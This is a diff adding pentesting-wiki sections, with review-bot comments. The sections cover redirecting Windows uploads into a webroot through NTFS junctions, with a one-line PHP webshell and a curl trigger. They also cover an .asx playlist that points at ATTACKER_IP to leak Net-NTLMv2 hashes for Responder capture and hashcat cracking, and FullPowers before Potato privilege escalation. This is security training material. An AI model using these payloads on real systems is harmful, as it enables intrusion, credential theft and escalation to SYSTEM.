Original file line number Diff line number Diff line change
Expand Up @@ -220,4 +220,4 @@ Hunting/IOCs
- [Check Point Research – ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib – New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)

{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
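Review bot: the closing `{{#include ../../banners/hacktricks-training.md}}` appears twice at the end of this hunk (the last two lines). For a 4-line-to-4-line hunk this is most likely a whitespace or line-ending change rendered as a remove/add pair, but if the second line was really added, mdBook will render the training banner twice on that page; please confirm that only one include line remains in the committed file.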
29 changes: 29 additions & 0 deletions src/pentesting-web/file-upload/README.md
Expand Up @@ -162,6 +162,33 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================

Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.

### Escaping upload directory via NTFS junctions (Windows)

When uploads are stored under per-user subfolders on Windows (e.g., C:\Windows\Tasks\Uploads\<id>\) and you control creation/deletion of that subfolder, you can replace it with a directory junction pointing to a sensitive location (e.g., the webroot). Subsequent uploads will be written into the target path, enabling code execution if the target interprets server‑side code.

Example flow to redirect uploads into XAMPP webroot:

```cmd
:: 1) Upload once to learn/confirm your per-user folder name (e.g., md5 of form fields)
:: Observe it on disk: C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882

:: 2) Remove the created folder and create a junction to webroot
rmdir C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882
cmd /c mklink /J C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882 C:\xampp\htdocs

:: 3) Re-upload your payload; it lands under C:\xampp\htdocs
:: Minimal PHP webshell for testing
:: <?php echo shell_exec($_REQUEST['cmd']); ?>

:: 4) Trigger
curl "http://TARGET/shell.php?cmd=whoami"
```

Notes
- mklink /J creates an NTFS directory junction (reparse point). The web server’s account must follow the junction and have write permission in the destination.
- This redirects arbitrary file writes; if the destination executes scripts (PHP/ASP), this becomes RCE.
- Defenses: don’t allow writable upload roots to be attacker‑controllable under C:\Windows\Tasks or similar; block junction creation; validate extensions server‑side; store uploads on a separate volume or with deny‑execute ACLs.

## Tools

- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
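Review bot: step 2 of the cmd example will fail as written, because step 1 has just written an upload into the per-user folder and a plain `rmdir C:\Windows\Tasks\Uploads\<hash>` refuses a non-empty directory ("The directory is not empty"); use `rmdir /S /Q C:\Windows\Tasks\Uploads\33d81ad509ef34a2635903babb285882` or delete the uploaded file first. The `cmd /c` prefix on the `mklink` line is redundant inside a cmd session. Two points for the surrounding text: first, the section sits in a web file-upload page, but the technique presupposes command execution on the host (you have to run `rmdir` and `mklink` yourself), so say up front that this is a post-exploitation trick for the case where the web application writes files as a different, more privileged account than the one you already have, and "you control creation/deletion of that subfolder" should spell that out. Second, the Notes should explain why a junction and not a symlink: `mklink /J` needs no SeCreateSymbolicLinkPrivilege, only write access to the parent directory, whereas `mklink /D` does, which is exactly what makes a user-writable parent such as `C:\Windows\Tasks` usable from a low-privilege shell. In the defensive bullet, "block junction creation" is not actionable for an application; a concrete check is to refuse to write into a target directory that is a reparse point (`fsutil reparsepoint query <dir>`, or `dir /AL` to list them) and to verify that the resolved path of the destination is still under the upload root before writing.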
Expand Down Expand Up @@ -340,5 +367,7 @@ How to avoid file type detections by uploading a valid JSON file even if not all
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)

{{#include ../../banners/hacktricks-training.md}}
38 changes: 37 additions & 1 deletion src/windows-hardening/ntlm/places-to-steal-ntlm-creds.md
Expand Up @@ -4,7 +4,43 @@

**Check all the great ideas from [https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) from the download of a microsoft word file online to the ntlm leaks source: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md and [https://github.com/p0dalirius/windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)**

{{#include ../../banners/hacktricks-training.md}}
---

## Windows Media Player playlists (.ASX/.WAX)

If you can get a target to open or preview a Windows Media Player playlist you control, you can leak Net‑NTLMv2 by pointing the entry to a UNC path. WMP will attempt to fetch the referenced media over SMB and will authenticate implicitly.

Example payload:

```xml
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
```

Collection and cracking flow:

```bash
# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
```

Notes
- Works with .asx and .wax. Generate files with ntlm_theft for convenience.
- Effective when apps/services automatically open uploads for preview (e.g., HR reviewing candidate videos).
- Mitigations: Disable NTLM/SMB egress, don’t auto-open untrusted media, and harden WMP associations.

## References
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft](https://www.morphisec.com/blog/5-ntlm-vulnerabilities-unpatched-privilege-escalation-threats-in-microsoft/)
- [ntlm_theft – NTLM coercion file generator](https://github.com/Greenwolf/ntlm_theft)
- [Responder](https://github.com/lgandx/Responder)

{{#include ../../banners/hacktricks-training.md}}
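Review bot: the cracking line should pass the hash mode explicitly, `hashcat -m 5600 hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt`; Responder writes NetNTLMv2 captures in the 5600 format, and relying on autodetection is fragile (builds before 6.0 default to MD5 and reject the token, and newer builds refuse to guess when a file holds more than one hash type). In the payload, `<ref href="file://ATTACKER_IP\\share\\track.mp3" />` mixes a `file://` scheme with doubled backslashes; the file is XML, where backslashes need no escaping, so the attribute literally contains `\\share\\track.mp3` with no leading `\\` for the host. A plain UNC target, `<ref href="\\ATTACKER_IP\share\track.mp3" />`, is the unambiguous form that forces the SMB connection (or take the .asx/.wax that ntlm_theft emits verbatim, since the notes already recommend it). On the capture line, unless a `Responder` wrapper is on PATH the command is `responder` on Kali or `sudo python3 Responder.py -I <iface>` from a checkout. Finally, the mitigation "Disable NTLM/SMB egress" is two separate controls and should be listed as such: block outbound TCP/445 at the perimeter, which removes the SMB connection the leak depends on, and set "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all, which stops the client from answering the challenge even where 445 is reachable.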
Original file line number Diff line number Diff line change
Expand Up @@ -37,6 +37,7 @@ whoami /priv | findstr /i impersonate

Operational notes:

- If your shell runs under a restricted token lacking SeImpersonatePrivilege (common for Local Service/Network Service in some contexts), regain the account’s default privileges using FullPowers, then run a Potato. Example: `FullPowers.exe -c "cmd /c whoami /priv" -z`
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
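Review bot: the FullPowers bullet omits the prerequisite the tool depends on: it recovers the default privilege set only for LOCAL SERVICE and NETWORK SERVICE, by creating a scheduled task that re-launches the command under the account's full default token, so it needs the Task Scheduler service running and does nothing for other low-privilege principals. Suggest adding `whoami /user` next to the `whoami /priv | findstr /i impersonate` check so the reader confirms the account before reaching for it, and making explicit that the FullPowers process has SeImpersonatePrivilege but is still not SYSTEM, which is why the Potato step that follows is still needed ("then run a Potato" implies this but does not say it).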
Expand Down Expand Up @@ -187,5 +188,7 @@ SigmaPotato adds modern niceties like in-memory execution via .NET reflection an
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
- [FullPowers – Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)

{{#include ../../banners/hacktricks-training.md}}